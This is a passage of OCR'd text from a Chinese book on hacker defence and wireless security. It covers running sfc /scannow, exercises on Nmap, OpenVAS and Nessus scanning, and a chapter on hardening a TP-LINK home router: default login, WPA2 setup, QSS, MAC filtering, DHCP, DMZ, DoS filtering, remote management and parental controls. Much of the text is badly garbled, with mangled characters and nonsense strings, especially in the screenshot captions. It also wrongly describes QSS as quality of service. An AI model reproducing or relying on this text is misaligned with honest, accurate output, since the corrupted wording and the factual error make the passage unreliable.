e /CACHESIZE=x: 设置 文件 缓存 
大 小 。 

下 面 以 最 常用 的 sfc/scannow 为 例 进行 

讲解 。 具 体操 作 步 骤 如 下 : 


右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “命令 提示 符 ( 管 理 员 ) ”菜单 
命令 ， 如 下 图 所 示 。 


step 国 弹出 “管理 员 : 命令 提示 符 ” 窗 口 ， 
输入 命令 sfc/scannow， 按 Enter 键 确认 ， 如 
下 图 所 示 。 


第 12 章 ”无线 网 络 中 主机 漏洞 的 安全 防护 


开始 自动 扫描 系统 ， 并 显示 扫描 的 进 
度 ， 如 下 图 所 示 。 


2 员 ; 命令 可 下 符 本 5 一 
加 员 ; 党 令 担 二 符 - sfc /scannow 口 


10. 0. 10588) 
irpOoratione 保留 所 有 权 乔 |。 


开始 系统 扫描 。 此 过 程 将 需要 一 些 时 间 |。 


开始 圣 统 扫描 的 验证 阶段 。 
证 21% 已 完成。 


uF 


测 坎 五 笔 半 ， 


扫描 的 过 程 中 ， 如 果 发 现 损 坏 的 系 
统 文件 ， 会 自动 进行 修复 操作 ， 并 显示 修 


复 后 的 信息 ， 如 下 图 所 示 。 


画 管理 员 ; 命令 担 节 符 - :fc /scannow 一 口 X 


于 四 对 统 扫描 。 此 过 程 将 需要 一 些 B 寺 [al]. 


始 圣 绽 扫 扫 的 验证 阶段 
让 21% 已 完成 。 


Hw 2 


Hindows 这 Pl 仁 | 找 邓 | 
CBb .Log windilsLoge' 


了 损 杯 实 件 并 成 功 | 
gexcBSNCBS .log 中 有 有 详 引 和 信息,、 ) 
C:\Windows\Logs CBE “CBE .log。 请 注意 ， 在 了 台 机 且 务 万 案由 ， 
当前 不支 持 日 志 记 录 ， 


,ndors， SYSEnmI Ye 


小 试 对 手 


使 用 Nmap 工 具 扫描 漏洞 。 
使 用 OpenVAS 工 具 扫 描 漏洞 。 
使 用 Nessus 工 具 扫 摘 漏 洞 。 
系统 漏洞 的 安全 防护 。 


12.8 


练习 1: 
练习 2: 
练习 3: 
练习 4: 
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种 13 重 ”加 固 无 线 网 络 的 大 [ 


在 无 线 网 络 中 ， 能 够 发 送 与 接收 信号 的 重要 设备 就 是 无 线路 由 器 了 ， 因 此 ， 对 无 
线路 由 器 的 安全 防护 ， 就 等 于 看 紧 无 线 网 络 的 大 门 。 本 草 介绍 无 线路 由 器 的 安全 防护 策 
略 ， 主 要 包括 无 线路 由 器 的 基本 设置 、 无 线路 由 器 的 安全 策略 以 及 无 线路 由 安全 管理 工 


有 具 等 。 


噶 负 13.1 无 线路 由 豆 的 基本 设 壮 


无 线路 由 器 相信 大 家 都 不 陌生 ， 但 是 
懂得 如 何 设 置 的 却 不 多 。 本 节 针 对 家 用 无 
线路 由 器 的 设置 进行 讲解 。 


13.1.1 通过 设置 向 导 快 速 上 网 


目前 多 数 家 用 无 线路 由 器 都 提供 了 
网 页 进入 页 面 ， 当 用 户 登 录 路 由 后 会 提供 
一 个 同 导 ， 通 过 向 导 设 置 可 以 最 快 地 实现 
连接 外 网 。 家 用 路 由 器 背面 会 有 路 由 器 型 
号 、 路 由 器 IP (进入 路 由 的 地 址 ) 、 管 理 员 
账号 及 密码 等 信息 ， 如 下 图 所 示 。 


漆 训 市 奉 联 技术 有 限 公 局 


| TP-LINK 


通过 向 导 设 置 路 由 器 并 进行 上 网 的 具 
体操 作 步 又 如 下 : 

打开 JIE 浏 览 器 ， 在 地 址 栏 中 输入 路 由 
器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 网 址 
为 192.168.0.1， 输 入 完成 后 单 击 “ 转 至 ” 按 
钮 ， 即 可 打开 路 由 器 的 登录 窗口 ， 如 下 图 
所 示 。 


回 TL-WR835N 


x 图 
€ HD © | 80 六 | 三 鸣 


请 输入 管理 员 密 码 


在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 123456， 如 下 图 所 示 。 


回 TL-WR885MN 


x 十 


Ce 2 | 19216801 六 | 三 次 


十 输入 管理 员 密 色 


单 击 “ 确 认 ” 按 钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


旺 TLWR885N x BE 


二 二 192.168.0.1 六 | 一 


Xx 


- 口 
oO- 


TP-LINIK [一 一 NN 天线 谏 率 汪 与 现 无 线 自 由 连 护 专 想 


版 本 信息 
当前 执 件 版 本 : 
当 疝 王 件 版 本 : 


Mac 地 址 : 14-75-30-1F-95-54 
IF 直 址 : 192. 463.0.1 
子 网 搜 码 ; 255 .255 255.0 


LO2 Buld 1405 以 Rel. 3313%m 
Ws Lo OIMoOD 


无 圭 功 和 小 : 启用 

SSID 号 : TP-LDE1 

仿 前: 自动 《当前 启 痢 213 
荡 式 : llben nixed 

冰 员 贡 帘 ， 守 动 

MC 机 : 14-75-90-1F-95-Ed 


eo 了 选择 “设置 向 导 ” 选 项 ， 即 可 进入 
“设置 向 导 ” 对 话 框 ， 如 下 图 所 示 。 


设置 9] 写 


本 [9 号 可 设置 上 网 所 需 的 基本 网 络 参 数 ， 请 单 击 “ 下 一 步 ” 继 续 。 若 要 详细 设 
置 某 项 功能 或 参数 ， 请 点 击 左 侧 由 关 栏 目 。 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “设置 向 
导 - 上 网 方式 ”对 话 框 ， 在 其 中 选择 上 网 方 
式 。 其 中 PPPoE 为 拨号 上 网 ， 一 般 由 运营 商 
提供 具体 账号 、 密 码 ， 动 态 IP 和 静态 IP 则 多 
为 分 网 时 使 用 ， 可 以 根据 实际 需求 选择 ， 
如 下 图 所 示 。 


设置 向 号 -上 网 方式 


本 向 号 提供 三 种 最 常见 的 上 网 方式 供 选 择 。 若 为 其 它 上 网 方式 ， 请 点 击 左 人 出 “网 
络 参 数 ” 中 “WAN 口 设置 ”进行 设置 。 如 果 不 清楚 使 用 何 种 上 网 方式 ， 请 选择 “让 
路 由 器 自动 选择 上 网 方式 ”。 


和 让 路 由 器 自动 选择 上 网 方式 (推荐 ) 

PPPoE ( ADSL 虚 拟 拨 吕 》 

动态 IP 《以 太 网 宽带 ， 自 动 从 网 络 服务 商 获 取 IP 地 址 ) 
了 静态 IF (以 太 了 网 宽带 ， 网 络 服 务 商 提供 固定 TP 地址 》 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “设置 
向 导 - 无 线 设 置 ” 对 话 框 ， 在 其 中 设置 路 
由 器 无 线 网 络 的 基本 参数 以 及 无 线 安 全 
选项 ，“ 无 线 安 全 选项 ”可 以 采用 WPA- 
PSK/WPA2-PSK 方 式 输入 窗 码 ， 如 下 图 
所 示 。 


第 13 章 ”加 固 无 线 网 络 的 大 门 下 下 


设置 向 导 - 无 线 设置 
本 向 导 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 以 及 无 线 安全 。 
无 线 状态 : [开启 | 


SSID: 
信道 : 动 Y 

模式 : 11bgn mixed 

频段 带宽 ; 


无 线 安全 选项 ; 
为 保障 4 络 安全 ， 强 烈 推荐 开启 无 线 安全 ， 并 使 用 WPA-TSKAWPA2-PSK AES 加 密 方 
式 。 


| 不 开启 无 线 去 全 
® WPA-PSK/WPA2-PSK 
FSK 客 码 : 
(8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字符 》 
| 不 修改 无 线 安全 设置 


侈 注意 : 无 线 密码 长 度 不 能 小 于 8， 否 则 会 
有 提示 ， 如 下 图 所 示 。 


192.168.1.1 显示 : 


PSK 密 码 长 度 不 能 小 于 8， 请 事 新 办 入 ! 


禁止 此 页 再 显示 对 话 框 


se 单 讲 “下 一 步 ”按钮 ， 即 可 完成 向 导 
设置 ， 并 弹出 下 图 所 示 的 对 话 框 。 


设置 完成 ， 单 击 “ 重 启 ” 后 路 由 器 将 重启 以 使 设置 生效 。 


提示 : 若 路 由 器 重启 后 仍 不 能 正常 上 了 网， 请 点 击 左 人 出 “网 络 瑚 数 ” 进 
入 “WAE 口 设置 ”栏目 ， 确 认 是 否 设置 了 正确 的 WAN 口 连 接 类 型 和 拔 号 模式 。 


[上 =- 步 ] [重启 ] 


[step 图 单 去 “重启 ”按钮 ， 重 局 路 由 器 ， 如 
下 图 所 示 。 等 待 路 由 器 重启 完成 后 ， 就 可 
以 进行 上 网 了 。 


重新 自动 


配置 保存 成 功 ! 
正在 重新 启动 


35M [ES 
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黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


13.1.2 ”状态 查看 及 QSS 安 全 设置 


设置 好 路 由 器 以 后 ， 重 启 路 由 右 并 重 
新 进入 路 由 ， 此 时 可 以 查看 路 由 右 的 运行 
状态 ， 路 由 状态 给 出 了 路 由 器 运行 时 的 一 
些 简要 信息 。 在 路 由 的 左 侧 功能 列表 中 选 
择 “运行 状态 ”选项 ， 在 打开 的 界面 中 可 
以 查看 路 由 器 的 状态 ， 主 要 包括 以 下 几 个 
信息 。 

(1) 版 本 信息 。 列 出 了 路 由 器 的 当前 
软件 版 本 及 硬件 版 本 信息 ， 如 下 图 所 示 。 


当前 软件 版 本 : 


4.19.18 Build 130123 Rel. 32679n 


当前 硬件 版 本 : WE845N 2.0 00000000 


(2) LAN 口 状 态 。 会 有 连 入 路 由 的 设 
备 MAC 地 址 、IP 地 址 、 子 网 掩 码 等 信息 ， 
如 下 图 所 示 。 


JIAC 地 址 ; 
IF 抽 址 : 
子 网 撞 码 : 


1C-FA-68-01-2F-08 
192. 168. 1.1 
255.205. 255.0 


(3) 无 线 状 态 。 会 有 此 路 由 配置 的 无 
线 信息 ， 其 中 包括 SSID 号 、 信 道 、 模 式 、 
MAC 地 址 等 信息 ， 如 下 图 所 示 。 


家 月 
TP-LINK_012F08 
自动 《当前 信道 1) 
1lbgn mixed 

频段 带 富 : 自动 

MAC 地 址 ; 1C-FA-68-01-2F-08 

WDs 状 态 : 未 开户 


(4)WAN 口 状态 。 显 示 外 网 连接 情况 。 
如 果 路 由 器 无 法 正常 上 网 可 以 查看 此 处 ， 
排查 故障 ， 如 下 图 所 示 。 


1C-FA-68-01-2F-09 
0.0.0.0 
0.0,.0.0 
0.0.0.0 
0.0.0.0 ，0.0.0.0 


动态 IF 


WAN 口 未 连接 ! 


DNS 服务 器 : 


(5) WAN 口 流量 统计 。 这 里 负责 统计 
上 网 流量 信息 ， 如 果 网 络 异 常数 据 量 过 大 
可 以 查看 这 里 的 信息 ， 如 下 图 所 示 。 


240 


WAN 口 流量 统计 


在 路 由 功能 列表 中 选择 “QSS 安 全 设 
置 ” 选 项 ， 即 可 进入 “QSS 安 全 设置 ” 界 
面 。 在 其 中 可 以 对 路 由 器 的 QSS 功 能 进行 安 
全 设置 ， 如 下 图 所 示 。 


Qss 功 能 ; 


当前 PIN 码 ; 


35169857 


添加 新 设备 : 


侈 提示 : QSS， 即 服务 质量 ， 是 网 络 安 全 
机 制 的 一 种 ， 是 通过 给 局 域 网 中 的 应 用 、 
端口 或 计算 机 设 定 优 先 次 序 ， 从 而 解决 网 
络 延 迟 和 阻塞 等 问题 的 一 种 技术 。 在 正常 
情况 下 ， 如 果 网 络 只 用 于 特定 的 、 无 时 间 
限制 的 应 用 系统 ， 并 不 需要 QSS， 但 是 对 关 
键 应 用 和 多 媒体 应 用 就 十 分 必要 。 当 网 络 
超载 或 拥塞 时 ，QSS 能 确保 重要 业务 不 受 延 
迟 或 丢弃 ， 同 时 保证 网 络 的 高 效 运行 。 


13.1.3 网络 参数 与 无 线 设 置 


路 由 一 般 提 供 网 络 参数 设置 ， 其 中 包 
括 外 网 设置 、 内 网 设置 、MAC 地 址 复制 ， 
同时 无 线路 由 器 还 提供 无 线 设置 ， 如 下 图 
所 示 。 


无 线 安全 人 襄 下 


无 s 却 BC 地 址 小 


无 续 局 级 公 丰 


LAN 口 设置 
MAC 抽 址 克隆 


主机 状态 


网 络 参数 与 无 线 设置 的 操作 步骤 如 下 : 
[step 国 WANP 设置 ， 主 要 包括 WAN 口 连接 
类 型 ， 与 向 导 设 置 中 的 3 种 类 型 相同 ， 如 有 
特殊 需要 可 以 设置 DNS 服务 器 ， 否 则 保持 
默认 即 可 ， 如 下 图 所 示 。 


jyAr 口 设置 
WAN 口 连接 类 型 : 
IF 地 址 : 0.0.0.0 
子 网 摘 码 : 0.0.0.0 
网 关 : 0.0.0.0 
WH 口 未 连接 ! 
数据 Brv( 字 节 ): 《默认 是 1500， 如 非 必 要 ， 请 丸 修 改 ) 
一 手动 设置 DNS 服务 器 
DNS 服务 器 : 
备用 DNS 服务 器 ( 司 选 
主机 名 : 
-| 单 播 方式 获取 IF ‘一般 情况 下 请 牧 选 择 ) 


LAN 口 设置 ， 主 要 通过 子 网 掩 码 的 设 
置 划 分 内 网 网 段 ， 子 网 掩 码 的 设置 决定 了 
内 网 网 段 ， 同 时 也 确定 了 内 网 最 大 容纳 设 
备 数量 ， 如 下 图 所 示 。 


本 页 设置 LAH 口 的 基本 网 络 参 数 。 
WC 地 址 : 
IF 地 址 : 
子 网 撞 码 : 


1C-FA-68-01-2F-08 


192.168.1.1 
255.255.255.0 v 


MAC 地 址 复制 ， 可 以 对 路 由 器 MAC 
地 址 进行 复制 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 对 广域网 Hc 地址 。 


WAC 地 址 : 
当前 管理 ?Cgfpwc 地 址 : 
注意 : 只 有 局 域 网 中 的 计算 机 才能 使 用 本 功能 。 


无 线 网 络 基本 设置 ， 和 包括 SSID 《网络 
名 称 ) 号 的 设置 、 信 道 设置 、 通 信和 模式 以 
及 频段 带宽 等 参数 ， 如 下 图 所 示 。 


无 线 网 络 基 本 设置 
本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 


ssms: 
信道 : 

模式 : 

频段 带宽: 


妆 开启 SSII 广 播 
J 开启 WDS 


无 线 网 络 安 全 设置 ， 包 括 4 种 方式 ， 
第 1 种 不 开启 无 线 安 全 ， 这 种 方式 除 测试 


第 13 章 ”加 固 无 线 网 络 的 大 门 ”计时 


外 不 建议 使 用 ; 第 2 种 方式 使 用 WPA-PSK/ 
WPA2-PSK 方 式 ， 一 般 建 议 使 用 这 种 方式 ， 
目前 是 比较 主流 的 网 络 安全 方式 ; 第 3 种 方 
式 是 WPA/WPA2 方 式 ， 这 种 方式 同 第 2 种 方 
式 类 似 ， 只 是 加 密 方 式 为 自 定义 ; 第 4 种 方 
式 使 用 WEP 方 式 ， 该 方式 已 经 被 曝 出 存在 
严重 安全 隐患 ， 除 测试 外 不 建议 使 用 ， 如 
下 图 所 示 。 


无 线 网 络 安全 设置 


本 由 面 设 置 路 由 器 无 线 网 缩 的 安全 认证 选项 。 
安全 提示 : 为 保障 网 络 安 全 ， 强 烈 推 荐 开启 安全 设置 ， 并 使 用 旺 A- 
PSK/WPA2-PSK AES 加 密 方 法 。 


人 @ 不 开启 无 线 安全 

® WPA-PSK/WPA2-PSK 

Wi: 

加 天 法 : 

ps: 


(8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字 符 ) 


组 密 角 更 新 周 
其 : 


(单位 为 秘 ， 最 小 值 为 30， 不 更 新 则 为 0) 


FAP 和 
认证 类 型: 
加 密 算法 : 
Radius 服 务 器 IF: 
Radius 端 口 : 
Radius 密 码 : 

组 密 钥 更 新 周期 : 
(单位 为 秒 ， 最 小 值 为 30， 不 更 新 则 为 0) 


WEP 
认证 类 型 : 
WEP 密 钼 格式 : 
密 钥 选择 
窗 钥 1: 时 
密 钥 2: 

密 钥 3: 

密 钥 4: 


十 六 进 制 Y 
外 P 密 钥 密 钥 类 型 
Ee==== 
[一 一 一 一 
CC 
CC 


无 线 网 络 MAC 地 址 过 滤 设 置 ， 如 果 开 
启 MAC 地 址 过 滤 ， 只 有 添加 进来 的 MAC 设 
备 可 以 正常 通信 ， 列 表 之 外 的 设备 无 法 进行 
通信 ， 这 个 只 是 相对 的 ， 后 面 会 讲解 如 果 通 
过 MAC 复 制 实现 通信 ， 如 下 图 所 示 。 


无 续 隐 效 MAC 地 址 过 滤 设 置 


本 页 设置 hc 地 址 过 源 来 控 钊 计算 机 对 本 无 线 网 络 的 访问 。 
JIAC 地 址 过 源 功 能 : 已 关闭 


过 滤 规 刚 


但 。 樟 止 列表 中 生 欧 的 MAC 地 址 访问 本 无 线 网 络 
一 多 主 列表 中 生 欧 的 BC 地 址 访问 本 无 绪 网 络 


二 


种 除 拍 有 条 目 


添加 新 条 目 所 有 条 目 失效 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


无 线 高 级 设置 ， 其 中 有 Beacon 帧 广播 
间隔 时 间 ， 移 动 设 备 通过 Beacon 帧 检测 空 
间 中 存在 的 无 线路 由 ， 通 过 设置 Beacon 帧 
可 以 达到 隐藏 无 线路 由 的 效果 ， 如 下 图 所 
示 。 当 然 ， 隐 藏 无 线路 由 也 是 相对 的 。 后 
面 会 讲解 如 何 挖 出 隐藏 的 无 线路 由 。 


际 : 域 高 级 设置 
Beacon 时 模 ， (40-1000) 
RT5 肝 楼: (1-2346) 
分 片 病 值 : 2346 (25E-2346) 
DTDI 恒 直 : [1 |] (ss) 
开启 如 下 
”开启 Short 虹 
中 开启 好 隔离 


13.1.4 ”DHCP 与 转发 规则 


DHCP 服 务 是 给 内 部 网 络 或 网 络 服 务 供 
应 商 自 动 分 配 IP 地 址 ， 给 用 户 或 者 内 部 网 络 
管理 员 作 为 对 所 有 计算 机 做 中 央 管 理 的 手 
段 。 转 发 规则 是 内 网 与 外 网 的 一 个 映射 过 
程 ， 如 下 图 所 示 。 


DHCP 服 务 司 


转 友 规 刚 
窜 户 应 列表 a 
静态 地 址 分 本 UPnP 设 置 

设置 DHCP 与 转发 规则 的 操作 步骤 
如 下 : 
DHCP 服 务 ， 这 里 可 以 设置 地 址 池 的 
开始 与 结束 位 置 ， 还 可 以 设置 地 址 使 用 时 
间 、 网 关 、DNS 服 务 器 等 ， 如 下 图 所 示 。 


本 中 由 器 内 津 的 DHCF 服 务 器 能 自动 对 于 局 域 网 中 逢 计算 机 航 TCFAIF 协 议 。 


DHC? 服 务 器 : 
地 址 池 开始 地 址 : 


9 不 启用 全 自用 

地 址 池 结 束 地 址 : 

地 址 租 期 :; 藤 钟 【1 一 2680 苇 钟 ， 献 省 为 120 分 钟 》 
PS: (可 选 

瑞 省 域名 : (可 选 ) 

主 DHs 服 务 品 : 
备用 DNS 服务 器 : 


[step 图 客户 端 列 表 ， 这 里 可 以 显示 出 连接 路 
由 器 的 客户 端 ， 其 中 包括 客户 端的 名 称 、 
MAC 地 址 、IP 地 址 以 及 登录 时 间 。 遇 有 网 
络 故 障 可 以 从 这 个 列表 排查 可 疑 客户 端 ， 
如 下 图 所 示 。 


(本寺 
(本寺 
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客户 应 列表 


| 1 ER26X6ZS005V17IV| 00-6736-2F-I0-48 | 192.168.1.100 Pb1:48:21 


step 图 静态 地 址 分 配 ， 从 这 里 可 以 对 客户 端 
IP 地 址 进行 静态 分 配 ， 通 过 静态 分 配 设置 将 
不 再 通过 DHCP 动 态 分 配 ， 如 下 图 所 示 。 


本 向 侣 次 DMCP 服 务 雍 且 视 态 地 址 分 怀 功 训 。 


注意 : 添加 ， 删除 条 目 或 $ 已 有 条 目 做 任何 更 次， 和 得 户 本 设备 后 才能 生效 。 
[ 涿 加 新 条 目 | | 使 所 有 条 目 本 效 | [法 所 有 条 目 夫 效 | | 节 除 所 有 条 目 | 
[上 -页 | [下 -页 |] [ 圳 助 ] 


虚拟 服务 器 ， 虚 拟 服 务 器 定义 了 广 域 
网 服务 端口 和 局 域 网 网 络 服务 器 之 间 的 映 
射 关 系 ， 所 有 对 该 广域网 服务 端口 的 访问 
将 会 被 重 定位 给 通过 IP 地 址 指定 的 局 域 网 网 
络 服务 器 ， 如 下 图 所 示 。 


虚拟 服 劳 强 


虚拟 服务 器 定义 了 广域网 服务 端口 和 局 博 习 网 络 服务 器 之 间 的 映射 关系 ， 所 有 对 该 广 撒 辣 
服务 端口 的 访问 将 二 被 重 定 位 结 通 过 正 示 址 指定 的 出 或 中 况 络 服务 器 。 


[也 | RD | z | 也 说 | 状态 | 编 旭 | 


使 所 有 节目 生效 


[step 图 特殊 应 用 程序 ， 某 些 程序 需要 多 条 链 
接 ， 如 Internet 游 戏 、 视 频 会 议 、 网 络 电 话 
等 。 由 于 防火 墙 的 存在 ， 这 些 程序 无 法 在 
简单 的 NAT 路 由 下 工作 。 设 定 转发 规则 给 
特殊 应 用 程序 实现 NAT 地 址 转换 ， 如 下 图 
所 示 。 


某 些 程 友 需 要 沧 条 链接 ， 如 Iaternet 游 戏 ， 视 频 会 议 ， 辣 络 电话 千 * 由 于 防火 墙 的 存在 :这 
些 程序 无 法 在 简单 9XAT 窗 由 下 工作 。 特殊 应 用 程序 骨 呈 某 些 这 样 的 应 用 程序 能 镶 在 YAT 咎 
由 下 工作 。 


回 配 了 9 二 本 
添加 新 系 目 | [ 下 所 有 条 目 生效 | [ 使 所 有 条 目 兴 歼 | [ 喇 辽 所 有 条 目 


[sep 国 DMZ 主 机 ， 在 某 些 特殊 情况 下 ， 需 
要 让 局 域 网 中 的 一 台 计 算 机 完全 暴露 给 广 
域 网 ， 以 实现 双向 通信 ， 此 时 可 以 把 该 计 
算 机 设置 为 DMZ 主 机 ， 如 下 图 所 示 。 


在 某 些 特殊 情况 下 ， 需要 让 司 | 吉 隐 中 的 一 侣 计算 机 完全 暴露 给 广域网， 以 实 
现 驶 向 通信 ， 此 时 可 以 把 该 计算 机 设置 为 mWZ 主 机 。 


9 不 启用 


TE 状态 : 图 启用 


WE 主机 IF 地 址 : 


step 加 UPnP 设 置 ，UPnP 的 应 用 范围 非常 
广 ， 以 致 足够 可 以 实现 许多 现成 的 、 新 的 
及 令 人 兴奋 的 方案 ， 包 括 家 庭 自动 化 、 打 
印 、 图 片 处 理 、 厨 房 设 备 、 汽 车 网 络 和 公 
共 集 会 场所 的 类 似 网 络 等 ， 如 下 图 所 示 。 


本 页 设置 / 呈 示 Wo 的 设置 以 及 工作 扰 态 。 
当前 WPrf 状 杰 ; 开启 


当前 好 到 设置 列表 


[mn| 应 用 撞 述 | 外 读 口 | 也 议 类 型 | 内 SOD | Ttb 直 | 状态 | 


13.1.5 ”安全 设置 与 家 长 控制 


安全 设置 针对 一 些 可 能 遭受 的 网 络 攻击 
进行 防御 ， 家 长 控制 则 可 以 控制 未 成 年 人 浏 
虹 固 定 网 页 以 及 上 网 时 间 ， 如 下 图 所 示 。 


安全 设置 


远 绒 胰 B 官 百 


家 长 控制 
进行 安全 设置 与 家 长 控制 的 操作 步骤 
如 下 : 
[step 图 在 路 由 功能 列表 中 选择 “安全 设置 ” 选 
项 下 的 “高 级 安全 设置 ”选项 ， 进 入 “高 级 安 
全 设置 ”界面 ， 在 其 中 可 以 进行 相关 参数 的 
设置 并 阅读 相关 注意 事项 ， 如 下 图 所 示 。 


本 站 设置 高 级 安全 防范 柄 置 。 
注意 : ”1、 只 有 店 用 了 “了 O03 攻击 防 学 ”， 后 面 各 盏 才能 蚁 生效 。 
z、 这 里 “数据 世 统 计时 间 间 而 ”与 “系统 工 县 ”一 “ 注 里 流 
计 ” 中 的 “数据 包 统 计时 间 间 隔 ”为 同一 直 ， 元 论 在 哪 一 个 模块 述 
值 


数据 包 统 计时 间 间 隔 : 《5~60) 
Dos 攻 击 防范 : 


开启 TDIE-FLD00D 苏 击 过 滤 : 
ICMP-FLN0D 数 据 世 i 闭 值 : 《5 一 360D) 包 / 种 
开启 UDF-7LO0Dj 填 汇 : 
IUDF-FLO0I 数 据 包 冰 值 : 《5 一 3600) 


[500 | 也/ 


开启 TCP-5YH-FL00D 攻 击 ] 求 虑 : 


TCP-SYN-TLD00 数 据 包 山 值 : 5~3600) 包 ; 种 


癌 轮 来 自 WAHD 的 finz: 
琴 止 洲 自 LAN 品 的 Fing 忆 通过 路 由 各 


DoS 被 禁 主 机 列表 


选择 “ 远 端 WEB 管 理 ” 选 项 ， 在 打 
开 的 界面 中 可 以 设置 路 由 器 的 WEB 管 理 端 
口 和 广域网 中 可 以 执行 远 端 WEB 管 理 的 计 
算 机 IP 地 址 ， 在 设置 前 请 阅读 相关 注意 事 


‘防范 冲击 法 病毒 ) 


第 13 章 


项 ， 如 下 图 所 示 。 


远 端 BE 管理 


本 页 设置 路 由 器 的 旺 了 管理 端口 和 广域网 中 可 以 执行 远 端 虹 了 管理 的 计算 机 的 
IF 地 址 。 


注意 : ”1. 路 由 器 默认 的 籽 了 管理 端口 为 80， 如 果 您 改变 了 默认 的 他 B 管 理 
端口 【 剂 如 改 为 88) ， 则 您 必须 用 “IF 地 址 :端口 ”的 方式 【例如 
http: zz192.168.1.1:88) 才能 登录 路 由 器 执行 是 ?界面 管理 。 此 功 
能 需要 重启 路 由 器 才能 生效 。 
2. 路 由 器 默认 的 远 端 旺 B 管 理 IF 地 址 为 0.0.0.0， 在 此 默认 状态 
下 ， 广 域 网 中 所 有 计算 机 都 不 能 登录 路 由 器 执行 运 端 ‰B 管 理 ， 如 
果 您 改变 了 默认 的 远 端 WEB 管理 IF 地 址 【例如 改 为 202. 96. 12.8) ， 


则 广域网 中 只 有 县 有 指定 I 地 址 例如 202. 96. 12.8) 的 计算 机 才 
能 登录 路 由 器 执行 远 端 是 8B 管理。 如 果 将 远 端 是 B 管 理 IF 地 址 设 为 
255. 255. 255. 255， 那 么 ， 广域网 中 所 有 的 计算 机 都 可 以 登录 路 由 
器 执行 运 端 ‰B 管 理 。 
3. 如 果 业 8 管理 端口 与 “转发 规则 ”中 虚拟 服务 器 条 目的 端口 产生 
冲突 ， 当 您 保存 配置 时 ， 存 在 端口 冲突 的 虚拟 服务 器 条 目 将 被 自动 
禁用 。 

好 B 管 理应 口 : 

远 端 WEB 管 理 IP 地 址 : 


[确定 | [帮助 | 


在 路 由 功能 列表 中 选择 “家 长 控制 ” 
选项 ， 即 可 进入 “ 冢 长 控制 设置 ”界面 ， 
用 户 可 以 通过 本 界面 控制 小 孩 的 上 网 行 
为 ， 使 得 小 孩 的 计算 机 只 能 在 指定 时 间 访 
问 指定 的 网 站 ， 如 下 图 所 示 。 


CRE 
0000 | 


作 鸭 家 长 ， 浆 可 以 通过 本 负面 进行 设 下 ,控制 小 防 的 上 网 行 为 ， 使 向 3 训 和 C 只 能 在 描 定 时 间 访 问 推定 的 网 四 。 
不 在 规则 列 去 中 的 丰 家 长 FC 抱 法 上 了 网。 


] 


mil mi 地 坟 | RPR 少 祭 | 日程 计划 


扬 加 单个 条 目 | | 法 所 有 圣 目 生效 | | 访 所 有 对 目 具 区 


单 击 “增加 单个 条 目 ” 按 钮 ， 进 入 

“家 长 控制 规则 设置 ”界面 ， 如 下 图 所 
示 。 本 界面 中 的 日 程 计划 基于 路 由 器 的 系 
统 时 间 ， 用 户 可 以 在 “系统 工具 一 时 间 设 
置 ” 中 查看 和 设置 系统 时 间 。 


家 长 控制 规 刚 设 置 
本 页 设置 一 条 家 长 控制 条 目 


本 页 面 中 的 日 程 计划 苦于 暗 由 器 的 系统 时 间 ， 您 可 以 在 “系统 工具 -) 时 间 讼 
置 ” 中 查看 和 设置 系统 时 间 。 

小 孩 TC 和 Pc 地 址 : 

当前 局 博 到 中 FCBpAC 地 址 : 

给 允许 的 网 站 列表 一 个 描述 : | | 

介 许 小 孩 访 问 的 网 站 域名 : 


LL | 
LL | 
[| | 
LL | 
| 
LL | 
[| 


希望 在 哪些 时 修 生 小 : 任何 时 间 Y 


您 可 以 在 “上 网 控制 -> 日 程 计划 ”中 设置 时 间 列 
表 
状态 : [生效 "| 


保存] [返回 | [帮助 ] 
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加 固 无 线 网 络 的 大 门 ”于 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈《 超 值 版 ) 


侈 注意 : 一 旦 开启 家 长 控制 功能 ， 不 在 规 
则 列表 中 的 计算 机 将 无 法 上 网 。 
13.1.6 上 网 控制 与 路 由 功能 


上 网 控制 可 以 对 路 由 器 的 规则 、 
列表 、 


主机 
访问 目标 以 及 日 程 计划 进行 设置 ， 


路 由 功能 则 可 以 添加 路 由 表 。 
上 网 控制 


主机 列表 
访问 目标 
日 程 计划 
路 由 功能 


具体 操作 步骤 如 下 : 

在 路 由 功能 列表 中 选择 “上 网 控制 ” 
选项 下 的 “规则 管理 ”选项 ， 即 可 进入 
“上 网 控制 规则 管理 ”界面 ， 在 本 界面 ， 
用 户 可 以 打开 或 者 关闭 此 功能 ， 并 且 设 定 
默认 的 规则 。 更 为 有 效 的 是 ， 用 户 可 以 设 
置 灵 活 的 组 合 规则 ， 通 过 选择 合适 的 “ 主 
机 列表 ”“ 访 问 目标 ”“ 日 程 计划 ”， 构 
成 完整 而 又 强大 的 上 网 控制 规则 ， 如 下 图 
所 示 。 


范 由 党 本 出 限制 内 问 主机 的 上 辽 行 为 在 二 页 面 ， 外 可 以 打开 或 者 关闭 此 功能 并 且 刀 < 午 为 有 入 他 | 旺 ， 净 可 以 设 黄 架 活 的 组 合 
规则 ， 通 计 选 捧 合 过 的 "主机 31 坊 ”*" 访问 目标 "”* 日 程 计 草 ”， 构成 示 数 而 吕 < 强 上 内 各 风 


政府 过 政 规 刚 
几 息 计 襄 已 说 上 网 六 制 吉 四 的 3 捐 包 外 许 邓 过 本 如 由 浴 
几时 人行 襄 已 设 上 妆 主 制 规 四 的 3 所 包 ， 茶 止 邓 过 本 器 由 只 


[ER ] 

蕊 所 有 未 目 主 沙 ] [ 使 所 有 有 亲 目 夫 演 | [ 辣 陆 所 有 亲 呈 
而 师 [|] 条 
E= 到 | 压 = 到 当前 克 [ 7 页 [ 麻 勒 ] 


